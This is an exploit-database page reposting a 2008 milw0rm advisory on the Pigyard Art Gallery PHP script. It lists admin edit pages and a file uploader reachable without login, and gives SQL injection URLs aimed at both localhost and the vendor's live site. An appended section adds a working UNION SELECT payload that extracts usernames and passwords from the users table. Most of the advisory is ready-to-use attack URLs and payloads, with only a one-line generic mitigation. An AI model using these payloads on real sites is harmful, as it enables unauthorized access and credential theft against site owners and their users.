header-logo
Suggest Exploit
vendor:
Pigyard Art Gallery
by:
ZoRLu
8.8
CVSS
HIGH
Multiple Remote Vulnerabilities
N/A
CWE
Product Name: Pigyard Art Gallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Pigyard Art Gallery Multiple Remote Vulnerabilities

Pigyard Art Gallery is vulnerable to multiple remote vulnerabilities, including pictures, availibility, exhibitions, genres, media, artist, and empty artists and exhibitions edit and add. Additionally, the website is vulnerable to file upload.

Mitigation:

Ensure that all user input is properly validated and sanitized before being used in any SQL queries. Additionally, ensure that all user input is properly validated and sanitized before being used in any file uploads.
Source

Exploit-DB raw data:

###################################################################

Pigyard Art Gallery Multiple Remote Vulnerabilities

Script Buy Now : http://www.pigyardgallery.com/how_to_buy.php 

author: ZoRLu     

home: www.yildirimordulari.org

contact: trt-turk@hotmail.com

not: msn i ekleyipte aptal aptal konusmayýn yok ben seni eklemedim sen beni ekledin vs. sorularýnýz varsa sorarsýnýz cins cins konuþacaksanýz eklemeyin. 

##################################################################

Pigyard Art Gallery not to login admin. but the edit config web site 

this exploit:

Pictures Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_pictures

example web sites:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_pictures

Availibility Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_availibilities

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_availibilities

Exhibitions Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_exhibitions

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_exhibitions

Genres Edit & Add: 

http://localhost/module.php?module=gallery&modPage=view_genres

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_genres

Media Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_media

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_media

Artist Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_artists

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_artists

Empty Artists and Exhibitions Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_empty_picture_associates

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_empty_picture_associates


#########################################################################

File Upload:

http://localhost/php/templates/file_uploader/file_selector.php

example:

http://www.pigyardgallery.com/php/templates/file_uploader/file_selector.php


#######################################################################

SQL inj.

exploit 1:

http://loaclhost/module.php?module=gallery&modPage=show_pictures&artist=[SQL]

exploit 2:

http://loaclhost/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]

exploit 3:

http://loaclhost/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]


example web site:


http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&artist=[SQL]


http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]


http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]


example [SQL] : 

-1/**/union/**/select/**/0,1,2,3,4/*   ( to me don't script available. so table name and columns name not find. but this to script sql inj available)

##########################################################################

thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r,  KoDLoK(vur6un), siircicocuk, Dr.SaLTuK, kasIrga(lavrens), w3R3m

avkidis, head_hunter and all users yildirimordulari.org

O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :))  )

Efsane: YILDIRIMORDULARI.ORG

######################################################################


Added a default sql injection string by Aria-Security Team     /str0ke

Aria-Security Team, 
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal, iM4N, Kinglet,
Vendor: Pigyard Art Gallery Multiple SQL Injection
This is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181)

Original Link: http://forum.aria-security.net/showthread.php?p=1474

module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*
module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*


Regards,
The-0utl4w





# milw0rm.com [2008-02-24]

Navigation

Suggest Exploit

Services By CQR